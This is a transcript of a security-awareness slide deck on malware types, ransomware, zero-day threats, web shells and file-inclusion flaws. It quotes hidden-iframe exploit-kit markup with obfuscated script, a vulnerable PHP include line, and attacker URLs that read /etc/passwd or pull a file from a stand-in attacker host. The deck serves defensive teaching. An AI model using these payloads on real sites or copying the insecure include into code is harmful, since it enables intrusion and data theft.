by ravi kishore k, e-security team, technical officer, c ... · pdf filec-dac, hyd. malware...
TRANSCRIPT
By Ravi Kishore K, e-Security Team, Technical Officer, C-DAC, Hyd.
Malware
• Malware is short for Malicious Software
• Software that can be used to compromise computer functions, steal data, bypass access controls, or otherwise cause harm to the host computer.
• Malware is a broad term that refers to a variety of malicious programs.
C-DAC, Hyderabad 2
The only truly secure system is one that is powered off,
cast in a block of concrete & sealed in a lead-lined room with armed guards
- Gene Spafford
3 C-DAC, Hyderabad
90 % Of Companies got
Hacked
4 C-DAC, Hyderabad
To name few
5 C-DAC, Hyderabad
60 % got hacked twice
6 C-DAC, Hyderabad
50 % are unsure about
the hack
7 C-DAC, Hyderabad
Entry Points of Malware
• Applications
• Portable Storage Devices
• Web Browser
C-DAC, Hyderabad 8
Types of Malware
• Adware: Adware displays ads on your computer. Least Dangerous
• Spyware: Tracks internet activities to send adware • Virus: It’s program or code that attaches itself to
another piece of software, and then reproduces itself when that software is run
• Worm: A program that self replicates via network and destroys data and files on the computer
• Trojan: It discovers your financial information, taking over your computer’s system resources, and in larger systems creating a “denial-of-service attack “. Most Dangerous
C-DAC, Hyderabad 9
Types of Malware
• Logic Bomb: Logic bombs are usually programs that use either time or an event as the trigger. When the condition(s) stipulated in the instruction set is met, the code present in its payload is executed.
• Rootkit: Rootkits are (set of) programs used to alter the standard operating system functionality to hide any malicious activity done by it. Alters kernel, netstat, ls, ps with their own set of programs
• Backdoor: A Backdoor is an alternative entrance into a system. They are used to bypass the existing security mechanisms built into systems.
C-DAC, Hyderabad 10
Types of Malware
• Keylogger: Records everything you type on your PC in order to glean your log-in names, passwords, and other sensitive information, and send it on to the source of the keylogging program
• Ransomware:Ransomware could prevent the user from using their computer or accessing data. It encrypt files or completely lock the computer for ransom.
C-DAC, Hyderabad 11
Anatomy of Ransomware
C-DAC, Hyderabad 12
Ransom Message
C-DAC, Hyderabad 13
Ransom Message
C-DAC, Hyderabad 14
Mobile Ransomware
• Latest Android ransomware copies Google’s design style to make it appear more legitimate and intimidating when it displays fake FBI warnings on users’ lockscreens.
• Phone ransomware start to encrypt files, such as pictures, rather than simply change the phone’s access PIN.
C-DAC, Hyderabad 15
Malware
C-DAC, Hyderabad 16
BUGGY RANSOMWARE VIA APACHE'S BLACKHOLE EXPLOIT KIT
Ransomware Incident
C-DAC, Hyderabad 17
the code inside
• <title>ERROR: The requested URL could not be retrieved</title>
• <meta http-equiv="refresh" content="3;url=/cybercrime-suspect-arrested/">
• </head><body>
• <iframe src='h00p://mongif.biz/assumed/timing_borrows.php' width=1 height=1 style='visibility:hidden;'>
</iframe>
• <h1>ERROR</h1>
C-DAC, Hyderabad 18
Snipped the landing page code
<html><head><title></title></head><body> <applet code="hw" archive="/assumed/timing_borrows.php?ynafkyuv=tvmamz&vqew=fbu"> <param name="prime" value="" /> <param name="val" value="Dyy3Ojj0toA8.w?8UjViiK0eMjy808oAN?tllt_.. <div></div><script>functionc() {if(window.document)s+=String.fromCharCode(a[i]).. <script>var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:!!6:6!:!23:!.. !6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!:!!0:34:!25:44:!05:!!5.. 98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:63:!!0:!0!:!!9:32:82:!0.. 3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!09:!05:!!0:40:99:46:!08.. :48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:4!:!23:!05:!02:40:47:9.. :!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!!0:97:!!8:!05:!03:97:!.. 0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!:!02:93:46:!00:!0!:!!5.. :
C-DAC, Hyderabad 19
Zero-day Malware
• A ZERO DAY vulnerability refers to a hole in software that is unknown to the vendor.
• This security hole is then exploited by hackers before the vendor becomes aware and hurries to fix it—this exploit is called a ZERO DAY attack.
• Incident: McAfee Labs identified a zero-day vulnerability in Microsoft IE that was used as an entry point for Operation Aurora to exploit Google and at least 20 other companies” (Operation Aurora, 2010)
C-DAC, Hyderabad 20
Anti-Malware Solutions
• Signature based – Looks to match signatures found in files with that of
a database of known malware – Since vendors have no prior knowledge of the 0day,
signature-based systems, such as intrusion detection/prevention and anti-virus will not identify the threat.
• Heuristic based – Uses rules and/or algorithms to look for
commands which may indicate malicious intent. – Able to detect malware without needing a signature. – Zero-day threats are also detectable
C-DAC, Hyderabad 21
Mitigations to 0-day Malware
• Application Whitelisting – This is where the organization permits all known safe
production applications to run, and blocks all others.
• Heuristic Anti-Malware Solutions – Suffers slightly from False Alarms
• Update your Browser software and Anti-Virus regularly
• Install DoNotTrackMe browser extension
• Do not visit Reported Attack Websites
C-DAC, Hyderabad 22
Mitigations to Malware
• Malware Identification can be done at network perimeter level, host perimeter level or at the system level.
C-DAC, Hyderabad 23
Boom
56278
N-BIOS
FTP
HTTP(S)
RPC
Firewall Web/
Application Server
Database Server
Network Security
Controls
Lets See A Scenario
C-DAC, Hyderabad 24
Web Proxy Editor
Intercept the traffic between browser and the web server
Web Browser
Web Server
Proxy Server
C-DAC, Hyderabad 25
Techniques Hackers Use
• Find places to upload files/shells.
• Local File Inclusion
• Remote File Inclusion
• Brute Force Weak Passwords.,etc
C-DAC, Hyderabad 26
What is Web Shell ??
Malicious web page that provides attacker functionality
like
File transfer
Command execution
Database connectivity
Upload /delete /modify files from the web server.,etc
Network reconnaissance
Server-side scripting is used
Ex: PHP, ASP, ASPX, JSP, etc...
C-DAC, Hyderabad 27
Web shell runs with same privileges as the web server user.
C-DAC, Hyderabad 28
LOCAL FILE INCLUSION & REMOTE FILE INCLUSION
C-DAC, Hyderabad 29
LFI :
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser
This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
<? include($_GET['page']); ?>
General usage : http://localhost/index.php?page=contact_us.php
Attacker : http://localhost/index.php?page=../../../etc/passwd
LFI
C-DAC, Hyderabad 30
LFI/RFI Local File Inclusion of /etc/passwd
C-DAC, Hyderabad 31
RFI :
In Remote File Inclusion, attacker could inject a file remotely which will be parsed by PHP interpreter
<? include($_GET['page']); ?>
General usage : http://localhost/index.php?page=contact_us.php
Attacker : http://localhost/index.php?page=http://attackersHost/inject.txt
RFI
C-DAC, Hyderabad 32
Non Malicious Website Browsing Process
C-DAC, Hyderabad 33
Malicious Code Delivery Process in a Compromised Legitimate site
C-DAC, Hyderabad 34
References
• http://blog.malwaremustdie.org/2013/01/case-of-ransomware-with-backdoor.html
• https://www.sans.org/reading-room/whitepapers/incident/enterprise-survival-guide-ransomware-attacks-36962
• https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
• https://www.sans.org/reading-room/whitepapers/incident/responding-zero-day-threats-33709
• https://www.veracode.com/blog/2012/10/common-malware-types-cybersecurity-101
• Malware 101 - Viruses • https://en.wikipedia.org/wiki/Iframe_virus
C-DAC, Hyderabad 35
